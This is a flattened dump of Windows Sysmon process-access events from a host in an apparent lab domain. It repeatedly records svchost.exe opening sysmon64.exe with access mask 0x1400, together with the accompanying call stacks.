10:40:10.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001566Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001565Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001564Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001563Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001562Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001561Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001560Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001559Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001558Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001557Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001556Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001555Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001554Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001553Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001552Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001551Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001550Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001549Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001548Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001547Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001546Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001545Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001544Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001543Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 